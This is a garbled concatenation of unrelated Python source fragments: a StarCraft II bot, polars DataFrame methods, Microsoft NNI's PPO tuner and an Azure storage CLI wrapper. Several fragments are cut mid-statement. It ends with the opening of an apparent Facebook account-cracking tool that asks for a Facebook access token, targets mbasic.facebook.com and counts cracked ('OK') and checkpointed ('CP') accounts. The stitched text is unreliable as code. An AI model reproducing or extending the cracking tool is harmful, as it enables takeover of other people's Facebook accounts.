depot(AbilityId.MORPH_SUPPLYDEPOT_LOWER)
else:
depot(AbilityId.MORPH_SUPPLYDEPOT_LOWER)
"""
self.depots: Units = self.structures.of_type({UnitTypeId.SUPPLYDEPOT, UnitTypeId.SUPPLYDEPOTLOWERED})
if self.depots:
self.depot_placement_positions: Set[Point2] = {
d for d in self.depot_placement_positions if self.depots.closest_distance_to(d) > 1
}
# Lower depos when no enemies are nearby
for depot in self.structures(UnitTypeId.SUPPLYDEPOT).ready:
for unit in self.enemy_units:
if self.townhalls.amount == 1 and unit.distance_to(depot) < 15 and not unit.is_flying:
pass
elif unit.distance_to(depot) < 10 and
def sample(
self: DF,
n: Optional[int] = None,
frac: Optional[float] = None,
with_replacement: bool = False,
shuffle: bool = False,
seed: Optional[int] = None,
) -> DF:
"""
Sample from this DataFrame by setting either `n` or `frac`.
Parameters
----------
n
Number of samples < self.len() .
frac
Fraction between 0.0 and 1.0 .
with_replacement
Sample with replacement.
shuffle
Shuffle the order of sampled data points.
seed
Initialization seed. If None is given a random seed is used.
Examples
--------
>>> df = pl.DataFrame(
... {
... "foo": [1, 2, 3],
... "bar": [6, 7, 8],
... "ham": ["a", "b", "c"],
... }
... )
>>> df.sample(n=2, seed=0) # doctest: +IGNORE_RESULT
shape: (2, 3)
┌─────┬─────┬─────┐
│ foo ┆ bar ┆ ham │
│ --- ┆ --- ┆ --- │
│ i64 ┆ i64 ┆ str │
╞═════╪═════╪═════╡
│ 3 ┆ 8 ┆ c │
├╌╌╌╌╌┼╌╌╌╌╌┼╌╌╌╌╌┤
│ 2 ┆ 7 ┆ b │
└─────┴─────┴─────┘
"""
if n is not None and frac is not None:
raise ValueError("n and frac were both supplied")
if n is None and frac is not None:
return self._from_pydf(
self._df.sample_frac(frac, with_replacement, shuffle, seed)
)
if n is None:
n = 1
return self._from_pydf(self._df.sample_n(n, with_replacement, shuffle, seed))
def fold(
self, operation: Callable[["pli.Series", "pli.Series"], "pli.Series"]
) -> "pli.Series":
"""
Apply a horizontal reduction on a DataFrame. This can be used to effectively
determine aggregations on a row level, and can be applied to any DataType that
can be supercasted (casted to a similar parent type).
Examples of the supercast rules when applying an arithmetic operation on two DataTypes:
Int8 + Utf8 = Utf8
Float32 + Int64 = Float32
Float32 + Float64 = Float64
Examples
--------
A horizontal sum operation:
>>> df = pl.DataFrame(
... {
... "a": [2, 1, 3],
... "b": [1, 2, 3],
... "c": [1.0, 2.0, 3.0],
... }
... )
>>> df.fold(lambda s1, s2: s1 + s2)
shape: (3,)
Series: 'a' [f64]
[
4
5
9
]
A horizontal minimum operation:
>>> df = pl.DataFrame({"a": [2, 1, 3], "b": [1, 2, 3], "c": [1.0, 2.0, 3.0]})
>>> df.fold(lambda s1, s2: s1.zip_with(s1 < s2, s2))
shape: (3,)
Series: 'a' [f64]
[
1
1
3
]
A horizontal string concatenation:
>>> df = pl.DataFrame(
... {
... "a": ["foo", "bar", 2],
... "b": [1, 2, 3],
... "c": [1.0, 2.0, 3.0],
... }
... )
>>> df.fold(lambda s1, s2: s1 + s2)
shape: (3,)
Series: 'a' [str]
[
"foo11.0"
"bar22.0"
null
]
A horizontal boolean or, similar to a row-wise .any():
>>> df = pl.DataFrame(
... {
... "a": [False, False, True],
... "b": [False, True, False],
... }
... )
>>> df.fold(lambda s1, s2: s1 | s2)
shape: (3,)
Series: 'a' [bool]
[
false
true
true
]
Parameters
----------
operation
function that takes two `Series` and returns a `Series`.
"""
acc = self.to_series(0)
for i in range(1, self.width):
acc = operation(acc, self.to_series(i))
return acc
def row(self, index: int) -> Tuple[Any]:
"""
Get a row as tuple.
Parameters
----------
index
Row index.
Examples
--------
>>> df = pl.DataFrame(
... {
... "foo": [1, 2, 3],
... "bar": [6, 7, 8],
... "ham": ["a", "b", "c"],
... }
... )
>>> df.row(2)
(3, 8, 'c')
"""
return self._df.row_tuple(index)
def rows(self) -> List[Tuple]:
"""
Convert columnar data to rows as python tuples.
Examples
--------
>>> df = pl.DataFrame(
... {
... "a": [1, 3, 5],
... "b": [2, 4, 6],
... }
... )
>>> df.rows()
[(1, 2), (3, 4), (5, 6)]
"""
return self._df.row_tuples()
@overload
def shrink_to_fit(self: DF, in_place: Literal[False] = ...) -> DF:
...
@overload
def shrink_to_fit(self, in_place: Literal[True]) -> None:
...
@overload
def shrink_to_fit(self: DF, in_place: bool) -> Optional[DF]:
...
def shrink_to_fit(self: DF, in_place: bool = False) -> Optional[DF]:
"""
Shrink memory usage of this DataFrame to fit the exact capacity needed to hold the data.
"""
if in_place:
self._df.shrink_to_fit()
return None
else:
df = self.clone()
df._df.shrink_to_fit()
return df
def hash_rows(
self, k0: int = 0, k1: int = 1, k2: int = 2, k3: int = 3
) -> "pli.Series":
"""
Hash and combine the rows in this DataFrame.
Hash value is UInt64.
Parameters
----------
k0
seed parameter
k1
seed parameter
k2
seed parameter
k3
seed parameter
Examples
--------
>>> df = pl.DataFrame(
... {
... "foo": [1, 2, 3],
... "bar": [6, 7, 8],
... "ham": ["a", "b", "c"],
... }
... )
>>> df.hash_rows(k0=42) # doctest: +SKIP
shape: (3,)
Series: '' [u64]
[
1208206736888326229
8040480609798856146
18282897888575762835
]
"""
return pli.wrap_s(self._df.hash_rows(k0, k1, k2, k3))
def interpolate(self: DF) -> DF:
"""
Interpolate intermediate values. The interpolation method is linear.
Examples
--------
>>> df = pl.DataFrame(
... {
... "foo": [1, None, 9, 10],
... "bar": [6, 7, 9, None],
... "baz": [1, None, None, 9],
... }
... )
>>> df.interpolate()
shape: (4, 3)
┌─────┬──────┬─────┐
│ foo ┆ bar ┆ baz │
│ --- ┆ --- ┆ --- │
│ i64 ┆ i64 ┆ i64 │
╞═════╪══════╪═════╡
│ 1 ┆ 6 ┆ 1 │
├╌╌╌╌╌┼╌╌╌╌╌╌┼╌╌╌╌╌┤
│ 5 ┆ 7 ┆ 3 │
├╌╌╌╌╌┼╌╌╌╌╌╌┼╌╌╌╌╌┤
│ 9 ┆ 9 ┆ 6 │
├╌╌╌╌╌┼╌╌╌╌╌╌┼╌╌╌╌╌┤
│ 10 ┆ null ┆ 9 │
└─────┴──────┴─────┘
"""
return self.select(pli.col("*").interpolate())
def is_empty(self) -> bool:
"""
Check if the dataframe is empty
Examples
--------
>>> df = pl.DataFrame({"foo": [1, 2, 3], "bar": [4, 5, 6]})
>>> df.filter(pl.col("foo") > 99).is_empty()
True
"""
return self.height == 0
def to_struct(self, name: str) -> "pli.Series":
"""
Convert a ``DataFrame`` to a ``Series`` of type ``Struct``
Parameters
----------
name
Name for the struct Series
Examples
--------
>>> df = pl.DataFrame(
... {
... "a": [1, 2, 3, 4, 5],
... "b": ["one", "two", "three", "four", "five"],
... }
... )
>>> df.to_struct("nums")
shape: (5,)
Series: 'nums' [struct[2]{'a': i64, 'b': str}]
[
{1,"one"}
{2,"two"}
{3,"three"}
{4,"four"}
{5,"five"}
]
"""
return pli.wrap_s(self._df.to_struct(name))
def unnest(self: DF, names: Union[str, List[str]]) -> DF:
"""
Decompose a struct into its fields. The fields will be inserted into the
`DataFrame` at the location of the `struct` type.
Parameters
----------
names
Names of the struct columns that will be decomposed by its fields
Examples
--------
>>> df = (
... pl.DataFrame(
... {
... "int": [1, 2],
... "str": ["a", "b"],
... "bool": [True, None],
... "list": [[1, 2], [3]],
... }
... )
... .to_struct("my_struct")
... .to_frame()
... )
>>> df
shape: (2, 1)
┌─────────────────────────────┐
│ my_struct │
│ --- │
│ struct[4]{'int',...,'list'} │
╞═════════════════════════════╡
│ {1,"a",true,[1, 2]} │
├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┤
│ {2,"b",null,[3]} │
└─────────────────────────────┘
>>> df.unnest("my_struct")
shape: (2, 4)
┌─────┬─────┬──────┬────────────┐
│ int ┆ str ┆ bool ┆ list │
│ --- ┆ --- ┆ --- ┆ --- │
│ i64 ┆ str ┆ bool ┆ list [i64] │
╞═════╪═════╪══════╪════════════╡
│ 1 ┆ a ┆ true ┆ [1, 2] │
├╌╌╌╌╌┼╌╌╌╌╌┼╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌╌╌╌┤
│ 2 ┆ b ┆ null ┆ [3] │
└─────┴─────┴──────┴────────────┘
"""
if isinstance(names, str):
names = [names]
return self._from_pydf(self._df.unnest(names))
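# Round-trip sketch for the two struct helpers above (assumes `import polars as pl`
# and that this older polars API exposes `frame_equal`):
#
#     df = pl.DataFrame({"a": [1, 2], "b": ["x", "y"]})
#     s = df.to_struct("fields")            # Series of dtype struct[2]
#     df2 = s.to_frame().unnest("fields")   # back to two plain columns
#     assert df.frame_equal(df2)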
class RollingGroupBy(Generic[DF]):
"""
A rolling grouper. This has an `.agg` method which will allow you to run all polars expressions
in a groupby context.
"""
def __init__(
self,
df: DF,
index_column: str,
period: str,
offset: Optional[str],
closed: str = "none",
by: Optional[Union[str, List[str], "pli.Expr", List["pli.Expr"]]] = None,
):
self.df = df
self.time_column = index_column
self.period = period
self.offset = offset
self.closed = closed
self.by = by
def agg(
self,
column_to_agg: Union[
List[Tuple[str, List[str]]],
Dict[str, Union[str, List[str]]],
List["pli.Expr"],
"pli.Expr",
],
) -> DF:
return (
self.df.lazy()
.groupby_rolling(
self.time_column, self.period, self.offset, self.closed, self.by
)
.agg(column_to_agg) # type: ignore[arg-type]
.collect(no_optimization=True, string_cache=False)
)
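# RollingGroupBy is not meant to be constructed directly; it is the object that a
# DataFrame's groupby_rolling(...) presumably returns, so usage looks roughly like:
#
#     df.groupby_rolling(index_column="dt", period="2d").agg(pl.col("x").sum())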
class DynamicGroupBy(Generic[DF]):
"""
A dynamic grouper. This has an `.agg` method which will allow you to run all polars expressions
in a groupby context.
"""
def __init__(
self,
df: DF,
index_column: str,
every: str,
period: Optional[str],
offset: Optional[str],
truncate: bool = True,
include_boundaries: bool = True,
closed: str = "none",
by: Optional[Union[str, List[str], "pli.Expr", List["pli.Expr"]]] = None,
):
self.df = df
self.time_column = index_column
| |
# Source: farziengineer/nni, file: src/sdk/pynni/nni/ppo_tuner/ppo_tuner.py
# Copyright (c) Microsoft Corporation
# All rights reserved.
#
# MIT License
#
# Permission is hereby granted, free of charge,
# to any person obtaining a copy of this software and associated
# documentation files (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and
# to permit persons to whom the Software is furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING
# BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
ppo_tuner.py including:
class PPOTuner
"""
import os
os.environ["CUDA_VISIBLE_DEVICES"] = ""
import copy
import logging
import numpy as np
import json_tricks
from gym import spaces
import nni
from nni.tuner import Tuner
from nni.utils import OptimizeMode, extract_scalar_reward
from .model import Model
from .util import set_global_seeds
from .policy import build_lstm_policy
logger = logging.getLogger('ppo_tuner_AutoML')
def constfn(val):
"""wrap as function"""
def f(_):
return val
return f
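# Usage sketch: constfn(3e-4) returns a schedule that ignores the decay fraction,
# e.g. lr_fn = constfn(3e-4); lr_fn(0.5) == 3e-4. This keeps constant and decaying
# lr/cliprange schedules behind the same callable interface.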
class ModelConfig:
"""
Configurations of the PPO model
"""
def __init__(self):
self.observation_space = None
self.action_space = None
self.num_envs = 0
self.nsteps = 0
self.ent_coef = 0.0
self.lr = 3e-4
self.vf_coef = 0.5
self.max_grad_norm = 0.5
self.gamma = 0.99
self.lam = 0.95
self.cliprange = 0.2
self.embedding_size = None # the embedding is for each action
self.noptepochs = 4 # number of training epochs per update
self.total_timesteps = 5000 # number of timesteps (i.e. number of actions taken in the environment)
self.nminibatches = 4 # number of training minibatches per update. For recurrent policies,
# should be smaller or equal than number of environments run in parallel.
class TrialsInfo:
"""
Information about each trial from one model inference
"""
def __init__(self, obs, actions, values, neglogpacs, dones, last_value, inf_batch_size):
self.iter = 0
self.obs = obs
self.actions = actions
self.values = values
self.neglogpacs = neglogpacs
self.dones = dones
self.last_value = last_value
self.rewards = None
self.returns = None
self.inf_batch_size = inf_batch_size
#self.states = None
def get_next(self):
"""
get actions of the next trial
"""
if self.iter >= self.inf_batch_size:
return None, None
actions = []
for step in self.actions:
actions.append(step[self.iter])
self.iter += 1
return self.iter - 1, actions
def update_rewards(self, rewards, returns):
"""
after the trial is finished, its reward and return are updated
"""
self.rewards = rewards
self.returns = returns
def convert_shape(self):
"""
convert shape
"""
def sf01(arr):
"""
swap and then flatten axes 0 and 1
"""
s = arr.shape
return arr.swapaxes(0, 1).reshape(s[0] * s[1], *s[2:])
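# Shape example: an array collected as (nsteps, num_trials, ...), e.g. (8, 20, ...),
# becomes (20, 8, ...) after swapaxes and (160, ...) after the reshape, so every
# row is one (trial, step) sample ready for minibatching.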
self.obs = sf01(self.obs)
self.returns = sf01(self.returns)
self.dones = sf01(self.dones)
self.actions = sf01(self.actions)
self.values = sf01(self.values)
self.neglogpacs = sf01(self.neglogpacs)
class PPOModel:
"""
PPO Model
"""
def __init__(self, model_config, mask):
self.model_config = model_config
self.states = None # initial state of lstm in policy/value network
self.nupdates = None # the total number of times train() will be invoked, used to tune lr and cliprange
self.cur_update = 1 # record the current update
self.np_mask = mask # record the mask of each action within one trial
set_global_seeds(None)
assert isinstance(self.model_config.lr, float)
self.lr = constfn(self.model_config.lr)
assert isinstance(self.model_config.cliprange, float)
self.cliprange = constfn(self.model_config.cliprange)
# build lstm policy network, value share the same network
policy = build_lstm_policy(model_config)
# Get the nb of env
nenvs = model_config.num_envs
# Calculate the batch_size
self.nbatch = nbatch = nenvs * model_config.nsteps # num of record per update
nbatch_train = nbatch // model_config.nminibatches # get batch size
# self.nupdates is used to tune lr and cliprange
self.nupdates = self.model_config.total_timesteps // self.nbatch
# Instantiate the model object (that creates act_model and train_model)
self.model = Model(policy=policy, nbatch_act=nenvs, nbatch_train=nbatch_train,
nsteps=model_config.nsteps, ent_coef=model_config.ent_coef, vf_coef=model_config.vf_coef,
max_grad_norm=model_config.max_grad_norm, np_mask=self.np_mask)
self.states = self.model.initial_state
logger.info('=== finished PPOModel initialization')
def inference(self, num):
"""
generate actions along with related info from policy network.
observation is the action of the last step.
Parameters:
----------
num: the number of trials to generate
"""
# Here, we init the lists that will contain the mb of experiences
mb_obs, mb_actions, mb_values, mb_dones, mb_neglogpacs = [], [], [], [], []
# initial observation
# use the (n+1)th embedding to represent the first step action
first_step_ob = self.model_config.action_space.n
obs = [first_step_ob for _ in range(num)]
dones = [True for _ in range(num)]
states = self.states
# For n in range number of steps
for cur_step in range(self.model_config.nsteps):
# Given observations, get actions, values and neglogpacs from the policy network
actions, values, states, neglogpacs = self.model.step(cur_step, obs, S=states, M=dones)
mb_obs.append(obs.copy())
mb_actions.append(actions)
mb_values.append(values)
mb_neglogpacs.append(neglogpacs)
mb_dones.append(dones)
# The actions chosen at this step become the observations of the next step
obs[:] = actions
if cur_step == self.model_config.nsteps - 1:
dones = [True for _ in range(num)]
else:
dones = [False for _ in range(num)]
#batch of steps to batch of rollouts
np_obs = np.asarray(obs)
mb_obs = np.asarray(mb_obs, dtype=np_obs.dtype)
mb_actions = np.asarray(mb_actions)
mb_values = np.asarray(mb_values, dtype=np.float32)
mb_neglogpacs = np.asarray(mb_neglogpacs, dtype=np.float32)
mb_dones = np.asarray(mb_dones, dtype=np.bool)
last_values = self.model.value(np_obs, S=states, M=dones)
return mb_obs, mb_actions, mb_values, mb_neglogpacs, mb_dones, last_values
def compute_rewards(self, trials_info, trials_result):
"""
compute the rewards of the trials in trials_info based on trials_result,
and update the rewards in trials_info
Parameters:
----------
trials_info: info of the generated trials
trials_result: final results (e.g., acc) of the generated trials
"""
mb_rewards = np.asarray([trials_result for _ in trials_info.actions], dtype=np.float32)
# discount/bootstrap off value fn
mb_returns = np.zeros_like(mb_rewards)
mb_advs = np.zeros_like(mb_rewards)
lastgaelam = 0
last_dones = np.asarray([True for _ in trials_result], dtype=np.bool) # ugly
for t in reversed(range(self.model_config.nsteps)):
if t == self.model_config.nsteps - 1:
nextnonterminal = 1.0 - last_dones
nextvalues = trials_info.last_value
else:
nextnonterminal = 1.0 - trials_info.dones[t+1]
nextvalues = trials_info.values[t+1]
delta = mb_rewards[t] + self.model_config.gamma * nextvalues * nextnonterminal - trials_info.values[t]
mb_advs[t] = lastgaelam = delta + self.model_config.gamma * self.model_config.lam * nextnonterminal * lastgaelam
mb_returns = mb_advs + trials_info.values
trials_info.update_rewards(mb_rewards, mb_returns)
trials_info.convert_shape()
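# The loop above is standard GAE(lambda): delta_t = r_t + gamma * V_{t+1} * nonterminal - V_t,
# adv_t = delta_t + gamma * lam * nonterminal * adv_{t+1}, and returns = advantages + values,
# which is what the policy/value update in train() consumes.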
def train(self, trials_info, nenvs):
"""
train the policy/value network using trials_info
Parameters:
----------
trials_info: complete info of the generated trials from the previous inference
nenvs: the batch size of the (previous) inference
"""
# keep frac decay for future optimization
if self.cur_update <= self.nupdates:
frac = 1.0 - (self.cur_update - 1.0) / self.nupdates
else:
logger.warning('current update (self.cur_update) %d has exceeded total updates (self.nupdates) %d',
self.cur_update, self.nupdates)
frac = 1.0 - (self.nupdates - 1.0) / self.nupdates
lrnow = self.lr(frac)
cliprangenow = self.cliprange(frac)
self.cur_update += 1
states = self.states
assert states is not None # recurrent version
assert nenvs % self.model_config.nminibatches == 0
envsperbatch = nenvs // self.model_config.nminibatches
envinds = np.arange(nenvs)
flatinds = np.arange(nenvs * self.model_config.nsteps).reshape(nenvs, self.model_config.nsteps)
for _ in range(self.model_config.noptepochs):
np.random.shuffle(envinds)
for start in range(0, nenvs, envsperbatch):
end = start + envsperbatch
mbenvinds = envinds[start:end]
mbflatinds = flatinds[mbenvinds].ravel()
slices = (arr[mbflatinds] for arr in (trials_info.obs, trials_info.returns, trials_info.dones,
trials_info.actions, trials_info.values, trials_info.neglogpacs))
mbstates = states[mbenvinds]
self.model.train(lrnow, cliprangenow, *slices, mbstates)
class PPOTuner(Tuner):
"""
PPOTuner
"""
def __init__(self, optimize_mode, trials_per_update=20, epochs_per_update=4, minibatch_size=4,
ent_coef=0.0, lr=3e-4, vf_coef=0.5, max_grad_norm=0.5, gamma=0.99, lam=0.95, cliprange=0.2):
"""
initialization, PPO model is not initialized here as search space is not received yet.
Parameters:
----------
optimize_mode: maximize or minimize
trials_per_update: number of trials to have for each model update
epochs_per_update: number of epochs to run for each model update
minibatch_size: minibatch size (number of trials) for the update
ent_coef: policy entropy coefficient in the optimization objective
lr: learning rate of the model (lstm network), constant
vf_coef: value function loss coefficient in the optimization objective
max_grad_norm: gradient norm clipping coefficient
gamma: discounting factor
lam: advantage estimation discounting factor (lambda in the paper)
cliprange: cliprange in the PPO algorithm, constant
"""
self.optimize_mode = OptimizeMode(optimize_mode)
self.model_config = ModelConfig()
self.model = None
self.search_space = None
self.running_trials = {} # key:
# File: pyaz/storage/fs/directory/__init__.py
'''
Manage directories in Azure Data Lake Storage Gen2 account.
'''
from .... pyaz_utils import _call_az
from . import metadata
def create(name, account_key=None, account_name=None, auth_mode=None, connection_string=None, metadata=None, permissions=None, sas_token=None, timeout=None, umask=None):
'''
Create a directory in ADLS Gen2 file system.
Required Parameters:
- name -- The name of directory.
Optional Parameters:
- account_key -- Storage account key. Must be used in conjunction with storage account name. Environment variable: AZURE_STORAGE_KEY
- account_name -- Storage account name. Related environment variable: AZURE_STORAGE_ACCOUNT. Must be used in conjunction with either storage account key or a SAS token. If neither are present, the command will try to query the storage account key using the authenticated Azure account. If a large number of storage commands are executed the API quota may be hit
- auth_mode -- The mode in which to run the command. "login" mode will directly use your login credentials for the authentication. The legacy "key" mode will attempt to query for an account key if no authentication parameters for the account are provided. Environment variable: AZURE_STORAGE_AUTH_MODE
- connection_string -- Storage account connection string. Environment variable: AZURE_STORAGE_CONNECTION_STRING
- metadata -- Metadata in space-separated key=value pairs. This overwrites any existing metadata.
- permissions -- POSIX access permissions for the file owner, the file owning group, and others. Each class may be granted read, write, or execute permission. The sticky bit is also supported. Both symbolic (rwxrw-rw-) and 4-digit octal notation (e.g. 0766) are supported. For more information, please refer to https://docs.microsoft.com/azure/storage/blobs/data-lake-storage-access-control#levels-of-permission.
- sas_token -- A Shared Access Signature (SAS). Must be used in conjunction with storage account name. Environment variable: AZURE_STORAGE_SAS_TOKEN
- timeout -- Request timeout in seconds. Applies to each call to the service.
- umask -- When creating a file or directory and the parent folder does not have a default ACL, the umask restricts the permissions of the file or directory to be created. The resulting permission is given by p & ^u, where p is the permission and u is the umask. For more information, please refer to https://docs.microsoft.com/azure/storage/blobs/data-lake-storage-access-control#umask.
'''
return _call_az("az storage fs directory create", locals())
def exists(name, account_key=None, account_name=None, auth_mode=None, connection_string=None, sas_token=None, timeout=None):
'''
Check for the existence of a directory in ADLS Gen2 file system.
Required Parameters:
- name -- The name of directory.
Optional Parameters:
- account_key -- Storage account key. Must be used in conjunction with storage account name. Environment variable: AZURE_STORAGE_KEY
- account_name -- Storage account name. Related environment variable: AZURE_STORAGE_ACCOUNT. Must be used in conjunction with either storage account key or a SAS token. If neither are present, the command will try to query the storage account key using the authenticated Azure account. If a large number of storage commands are executed the API quota may be hit
- auth_mode -- The mode in which to run the command. "login" mode will directly use your login credentials for the authentication. The legacy "key" mode will attempt to query for an account key if no authentication parameters for the account are provided. Environment variable: AZURE_STORAGE_AUTH_MODE
- connection_string -- Storage account connection string. Environment variable: AZURE_STORAGE_CONNECTION_STRING
- sas_token -- A Shared Access Signature (SAS). Must be used in conjunction with storage account name. Environment variable: AZURE_STORAGE_SAS_TOKEN
- timeout -- Request timeout in seconds. Applies to each call to the service.
'''
return _call_az("az storage fs directory exists", locals())
def show(name, account_key=None, account_name=None, auth_mode=None, connection_string=None, sas_token=None, timeout=None):
'''
Show properties of a directory in ADLS Gen2 file system.
Required Parameters:
- name -- The name of directory.
Optional Parameters:
- account_key -- Storage account key. Must be used in conjunction with storage account name. Environment variable: AZURE_STORAGE_KEY
- account_name -- Storage account name. Related environment variable: AZURE_STORAGE_ACCOUNT. Must be used in conjunction with either storage account key or a SAS token. If neither are present, the command will try to query the storage account key using the authenticated Azure account. If a large number of storage commands are executed the API quota may be hit
- auth_mode -- The mode in which to run the command. "login" mode will directly use your login credentials for the authentication. The legacy "key" mode will attempt to query for an account key if no authentication parameters for the account are provided. Environment variable: AZURE_STORAGE_AUTH_MODE
- connection_string -- Storage account connection string. Environment variable: AZURE_STORAGE_CONNECTION_STRING
- sas_token -- A Shared Access Signature (SAS). Must be used in conjunction with storage account name. Environment variable: AZURE_STORAGE_SAS_TOKEN
- timeout -- Request timeout in seconds. Applies to each call to the service.
'''
return _call_az("az storage fs directory show", locals())
def delete(name, account_key=None, account_name=None, auth_mode=None, connection_string=None, sas_token=None, timeout=None, yes=None):
'''
Delete a directory in ADLS Gen2 file system.
Required Parameters:
- name -- The name of directory.
Optional Parameters:
- account_key -- Storage account key. Must be used in conjunction with storage account name. Environment variable: AZURE_STORAGE_KEY
- account_name -- Storage account name. Related environment variable: AZURE_STORAGE_ACCOUNT. Must be used in conjunction with either storage account key or a SAS token. If neither are present, the command will try to query the storage account key using the authenticated Azure account. If a large number of storage commands are executed the API quota may be hit
- auth_mode -- The mode in which to run the command. "login" mode will directly use your login credentials for the authentication. The legacy "key" mode will attempt to query for an account key if no authentication parameters for the account are provided. Environment variable: AZURE_STORAGE_AUTH_MODE
- connection_string -- Storage account connection string. Environment variable: AZURE_STORAGE_CONNECTION_STRING
- sas_token -- A Shared Access Signature (SAS). Must be used in conjunction with storage account name. Environment variable: AZURE_STORAGE_SAS_TOKEN
- timeout -- Request timeout in seconds. Applies to each call to the service.
- yes -- Do not prompt for confirmation.
'''
return _call_az("az storage fs directory delete", locals())
def move(name, new_directory, account_key=None, account_name=None, auth_mode=None, connection_string=None, sas_token=None, timeout=None):
'''
Move a directory in ADLS Gen2 file system.
Required Parameters:
- name -- The name of directory.
- new_directory -- The new directory name the users want to move to. The value must have the following format: "{filesystem}/{directory}/{subdirectory}".
Optional Parameters:
- account_key -- Storage account key. Must be used in conjunction with storage account name. Environment variable: AZURE_STORAGE_KEY
- account_name -- Storage account name. Related environment variable: AZURE_STORAGE_ACCOUNT. Must be used in conjunction with either storage account key or a SAS token. If neither are present, the command will try to query the storage account key using the authenticated Azure account. If a large number of storage commands are executed the API quota may be hit
- auth_mode -- The mode in which to run the command. "login" mode will directly use your login credentials for the authentication. The legacy "key" mode will attempt to query for an account key if no authentication parameters for the account are provided. Environment variable: AZURE_STORAGE_AUTH_MODE
- connection_string -- Storage account connection string. Environment variable: AZURE_STORAGE_CONNECTION_STRING
- sas_token -- A Shared Access Signature (SAS). Must be used in conjunction with storage account name. Environment variable: AZURE_STORAGE_SAS_TOKEN
- timeout -- Request timeout in seconds. Applies to each call to the service.
'''
return _call_az("az storage fs directory move", locals())
def list(account_key=None, account_name=None, auth_mode=None, connection_string=None, num_results=None, path=None, recursive=None, sas_token=None, timeout=None):
'''
List directories in ADLS Gen2 file system.
Optional Parameters:
- account_key -- Storage account key. Must be used in conjunction with storage account name. Environment variable: AZURE_STORAGE_KEY
- account_name -- Storage account name. Related environment variable: AZURE_STORAGE_ACCOUNT. Must be used in conjunction with either storage account key or a SAS token. If neither are present, the command will try to query the storage account key using the authenticated Azure account. If a large number of storage commands are executed the API quota may be hit
- auth_mode --
#!/usr/bin/python2
# coding=utf-8
# code by Bangsat-XD
# my facebook ( https://www.facebook.com/AA.RAKA2708 )
# (C) Copyright 407 Authentic Exploit
# Rebuild Copyright Can't make u real programmer:)
# Coded By Bangsat-XD.
import os
try:
import requests
except ImportError:
print '\n [×] Modul requests belum terinstall!...\n'
os.system('pip2 install requests')
try:
import concurrent.futures
except ImportError:
print '\n [×] Modul Futures belum terinstall!...\n'
os.system('pip2 install futures')
try:
import bs4
except ImportError:
print '\n [×] Modul Bs4 belum terinstall!...\n'
os.system('pip2 install bs4')
import requests, os, re, bs4, sys, json, time, random, datetime
from concurrent.futures import ThreadPoolExecutor as BangsatGanteng
from datetime import datetime
from bs4 import BeautifulSoup
ct = datetime.now()
n = ct.month
bulan = ['Januari', 'Februari', 'Maret', 'April', 'Mei', 'Juni', 'Juli', 'Agustus', 'September', 'Oktober', 'November', 'Desember']
try:
if n < 0 or n > 12:
exit()
nTemp = n - 1
except ValueError:
exit()
current = datetime.now()
ta = current.year
bu = current.month
ha = current.day
op = bulan[nTemp]
reload(sys)
sys.setdefaultencoding('utf-8')
### WARNA RANDOM ###
P = '\x1b[1;97m' # PUTIH
M = '\x1b[1;91m' # MERAH
H = '\x1b[1;92m' # HIJAU
K = '\x1b[1;93m' # KUNING
B = '\x1b[1;94m' # BIRU
U = '\x1b[1;95m' # UNGU
O = '\x1b[1;96m' # BIRU MUDA
N = '\x1b[0m' # WARNA MATI
my_color = [
P, M, H, K, B, U, O, N]
warna = random.choice(my_color)
# Raka <NAME>. #
#------------------------------->
ok = []
cp = []
id = []
user = []
num = 0
loop = 0
xi_jimpinx = '953529338576547'
koh = '100017584682867'
url = "https://mbasic.facebook.com"
hoetank = random.choice(['Yang posting orang nya ganteng:)', 'Lo ngentod:v', 'Never surrentod tekentod kentod:v'])
bulan_ttl = {"01": "Januari", "02": "Februari", "03": "Maret", "04": "April", "05": "Mei", "06": "Juni", "07": "Juli", "08": "Agustus", "09": "September", "10": "Oktober", "11": "November", "12": "Desember"}
# lempankkkkkkkk
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.03)
def tod():
titik = ['\x1b[1;92m. ', '\x1b[1;93m.. ', '\x1b[1;96m... ','\x1b[1;92m. ', '\x1b[1;93m.. ', '\x1b[1;96m... ']
for x in titik:
print '\r %s[%s+%s] menghapus token %s'%(N,M,N,x),
sys.stdout.flush()
time.sleep(1)
# LO KONTOL
logo = ''' \033[0;96m __ __ __ ______ ____
\033[0;96m \ \/ / ____ / |/ / _ )/ __/ ® \033[0m|| Created By ☆RAKA☆™︻®╤───────═◍➤
\033[0;96m \ / /___/ / /|_/ / _ / _/ \033[0m|| Github.com/Bangsat-XD
\033[0;96m /_/ /_/ /_/____/_/ \033[0;91mv2.0 \033[0m|| Facebook.com/GARANGAN.KECHE'''
lo_ngentod = '953529338576547'
# crack selesai
def hasil(ok,cp):
if len(ok) != 0 or len(cp) != 0:
print '\n\n %s[%s#%s] crack selesai...'%(N,K,N)
print '\n\n [%s+%s] total OK : %s%s%s'%(O,N,H,str(len(ok)),N)
print ' [%s+%s] total CP : %s%s%s'%(O,N,K,str(len(cp)),N);exit()
else:
print '\n\n [%s!%s] opshh kamu tidak mendapatkan hasil :('%(M,N);exit()
#masuk token
def bangsatxd():
os.system('clear')
print (' %s*%s tools ini menggunakan login token facebook.\n %s*%s apakah kamu sudah tau cara mendapatkan token facebook?\n %s*%s ketik %sopen%s untuk mendapatkan token facebook.'%(O,N,O,N,O,N,H,N))
kontol = raw_input('\n %s[%s?%s] ☆Enter Token☆ ™︻®╤───────═◍➤ :%s '%(N,M,N,H))
if kontol in ('open', 'Open', 'OPEN'):
